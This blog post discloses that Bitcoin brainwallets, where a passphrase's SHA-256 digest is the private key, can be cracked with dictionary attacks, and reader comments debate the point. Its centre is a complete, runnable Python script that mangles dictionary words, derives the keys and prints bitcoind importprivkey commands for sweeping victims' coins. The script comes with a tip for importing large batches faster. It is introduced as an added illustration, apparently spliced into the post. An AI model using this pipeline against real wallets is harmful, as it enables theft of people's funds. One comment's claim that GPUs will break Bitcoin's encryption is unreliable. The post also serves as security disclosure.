Bitcoin “Brainwallets” and why they are a bad idea

// Decided to publish this after some misgivings about disclosure. After telling Asher about it earlier, it was decided to disclose it to make people aware of the issue.

A week or two ago, I stumbled across an article about how these “Brainwallet” things were making your bitcoins “Deniable”, as no “wallet” exists except in your head.

How they work is quite simple: you pick a passphrase, and that passphrase becomes the one secret behind your “wallet”. So long as you remember it, you can access the wallet.

The passphrase is hashed with SHA-256 and the 32-byte digest is used directly as the private key, so you can regenerate your privkey at will from nothing but the passphrase. The privkey is turned into a bitcoin address using the standard algorithm (derive the secp256k1 public key, hash it, Base58Check-encode the result).

Now, whoever knows the private key owns that wallet, and whoever knows the passphrase can derive the private key. So the private key is based on insecure (user-supplied as opposed to random) data, normally a word or a short string of words, and everyone sucks at passphrases. Worse, there is no salt and no key stretching in the scheme: one plain SHA-256 per guess, which is about as cheap as a guess can get.

Now, how do we go about attacking this? Think of it as the same thing as cracking people's passwords.

You take a dictionary of likely-looking passphrases and hash each one with SHA-256 to produce a batch of candidate private keys. You then convert each key to Wallet Import Format (WIF), the Base58Check encoding Bitcoin uses for private keys, and pass the WIF string to bitcoind's importprivkey. If anyone was using that passphrase, all their bitcoin now belongs to you.
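As an added illustration (not the author's brainwallet.py and not the proof of concept linked further down), here is the whole pipeline in pure Python: passphrase to SHA-256 private key, private key to WIF via Base58Check, and a small dictionary run through a few password-cracker style mangling rules to produce a batch of importprivkey candidates. The dictionary, the mangling rules and the `crack` helper are constructed for this example; the only real dependency is hashlib.

```python
import hashlib

# Constructed for this example: a tiny stand-in for a real cracking wordlist.
DICTIONARY = ["password", "bitcoin", "correct horse battery staple", "letmein"]

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58encode(data: bytes) -> str:
    """Base58 encode, keeping each leading zero byte as a leading '1' as Bitcoin does."""
    n = int.from_bytes(data, "big")
    out = ""
    while n > 0:
        n, rem = divmod(n, 58)
        out = B58_ALPHABET[rem] + out
    pad = len(data) - len(data.lstrip(b"\x00"))
    return "1" * pad + out


def b58check(payload: bytes) -> str:
    """Base58Check: append the first 4 bytes of SHA256(SHA256(payload)), then Base58."""
    checksum = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    return b58encode(payload + checksum)


def brainwallet_privkey(passphrase: str) -> bytes:
    """The brainwallet scheme: the raw SHA-256 digest of the passphrase IS the private key.
    No salt, no iteration count, so one guess costs one hash."""
    return hashlib.sha256(passphrase.encode("utf-8")).digest()


def privkey_to_wif(privkey: bytes, compressed: bool = False) -> str:
    """Wallet Import Format: 0x80 || key [|| 0x01 for compressed pubkeys] || checksum, Base58."""
    if len(privkey) != 32:
        raise ValueError("private key must be exactly 32 bytes")
    payload = b"\x80" + privkey + (b"\x01" if compressed else b"")
    return b58check(payload)


def mutate(word: str):
    """Cheap mangling rules of the kind password crackers apply (constructed for the example)."""
    yield word
    yield word.capitalize()
    yield word.upper()
    for suffix in ("1", "123", "!", "2013"):
        yield word + suffix


def generate_wifs(dictionary):
    """Map every candidate passphrase to the WIF an attacker would hand to importprivkey."""
    seen = {}
    for word in dictionary:
        for candidate in mutate(word):
            if candidate not in seen:
                seen[candidate] = privkey_to_wif(brainwallet_privkey(candidate))
    return seen


def crack(dictionary, target_wifs):
    """Return {passphrase: wif} for every candidate whose WIF is in target_wifs.
    In the real attack there is no target list: you import every WIF and let bitcoind
    tell you which addresses hold coins."""
    return {p: w for p, w in generate_wifs(dictionary).items() if w in target_wifs}


if __name__ == "__main__":
    # One line per candidate, ready to be fed to bitcoind.
    for passphrase, wif in generate_wifs(DICTIONARY).items():
        print(f"bitcoind importprivkey {wif}  # {passphrase!r}")
```

The WIF output can be checked against the well-known test vector from the Bitcoin wiki (private key 0C28FCA386C7A227600B2FE50B7CAE11EC86D3BF1FBE471BE89827E19D72AA1D encodes to 5HueCGU8rMjxEXxiPuD5BDku4MkFqeZyd4dZ1jvhTVqvbTLvyTJ). Note that importprivkey rescans the block chain by default, so a large batch is far faster if the rescan is deferred until the last key has been imported.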

Being a lovely person, I wrote up a proof of concept based on brainwallet.py (a brainwallet generator) that automatically does all this. My code is terrible, but it proves the point I was trying to make. A better-written piece of code could import thousands of keys incredibly quickly, exhausting entire blocks of passphrase keyspace.

Proof of Concept

The brainwallet.py implementation I hacked into the above is available here: Brainwallet.py

The terrifying thing about this is that you are not only stealing “current” bitcoins, but also future ones. A cracked passphrase stays cracked: once its key is in your wallet, any coins anyone ever sends to that address later are yours too, and there is no way for the victim to know the passphrase was already taken.

So, tell your friends: Brainwallets are dumb.

-infodox

p.s.: we now accept bitcoin if you ever feel like buying us a beer. 1MJ6KnLdXm82UjdDuvgjxDhngLjBMJfamV

NOTE: We do not encourage or approve of stealing people's money. It is a bad idea.

13 thoughts on “Bitcoin “Brainwallets” and why they are a bad idea”

  1. It was just a matter of time until someone would find a simple way to break in; add the power of GPUs, and even bitcoin's strong encryption will be broken…

  2. Pingback: Erhöhtes Hacker-Risiko bei Bitcoin Brainwallets (“Increased hacker risk with Bitcoin brainwallets”) | Edv-Sicherheitskonzepte.de – News Blog aus vielen Bereichen

  3. I’m not sure exactly what brainwallets you’re talking about, but for example, Electrum generates a random 128-bit key and turns it into a mnemonic sequence of words in base 1626. The passphrase isn’t manually chosen.

  4. Thanks for your findings – however there is a big chance for people mistaking this as FUD (fear, uncertainty and doubt) towards brain wallets.
    Saying brainwallets are a bad idea is the same as saying passwords are a bad idea. Weak passwords are a bad idea – just as weak brain wallets are a bad idea. It is also true that humans pick bad passwords and brain wallets because they tend to be good at memorizing phrases which are easily determined by a computer. However, random passwords and brain wallets can be fairly strong, with many years of computing power needed to brute force them.

    Deterministic wallet seeds in the Bitcoin client Electrum for example have 128 bits of entropy. 12 words are taken from a list of contemporary English poetry with 1626 entries. This is roughly the same key space as using a 21 character base 64 password containing random computer generated letters, numbers and two special characters. This is pretty strong.

    I would advise to make note of this in your article as press reports i.e. http://www.heise.de/security/meldung/Erhoehtes-Hacker-Risiko-bei-Bitcoin-Brainwallets-1831843.html have used your blog post to state that brain wallets are generally a bad idea, which is not the case.

    • It is the human side of things I was pointing towards, in that people as a rule pick terrible passwords. Given the fact many normal users seeing this as convenient will likely choose a simple password, their coins are therefore at some risk.

      I will be investigating the implementation in Electrum, I actually was looking for a bitcoin client :)

  5. Please take this page down.

    Saying brainwallets are insecure because people choose bad passphrases is like saying all passwords are bad because people choose bad passwords.

    Bitcoin brainwallet clients such as electrum pick the seed words for you so you won’t be able to choose insecure words.

    Deterministic wallets are much more secure for the average user where the primary security risk or loss is their own incompetence. Many users do not know of the bitcoin keypool and run the risk of losing all their coins after 100 transactions if they do not regularly backup their files.

    The primary risk for single private key brainwallets is COMPLETELY different than what you posted about. The risk is that the user doesn’t understand that most bitcoin clients (e.g. bitcoin-qt) will send change to a NEW ADDRESS; so if you used a single-private-key brainwallet and deleted the wallet file, the coins are lost because they are in a new address.

    The solution to that problem would be to use a brainwallet that is comprised of deterministic private keys from a seed (such as electrum or armory).

  6. I don’t really understand what the problem is. The number of possible ways to combine even a short sequence of English words is practically infinite. Take this paragraph as an example. How could it be cracked by brute force?

    • It could be cracked by sha256-ing the entire internet. Seriously, people pick bad passphrases like their favorite line from their favorite classic book. But brain wallets are not bad, you just have to take precautions. First, “salt” the passphrase by putting your full name first. This adds a lot of easy-to-remember entropy. Essentially, by doing this an attacker cannot attempt to crack everybody’s passphrase at once — it must go after you specifically. Next, don’t pick any phrase that you’ve ever read anywhere, and make it pretty long if it has language redundancies (i.e. is an intelligible sentence). Or pick random words as these wallets do for you.
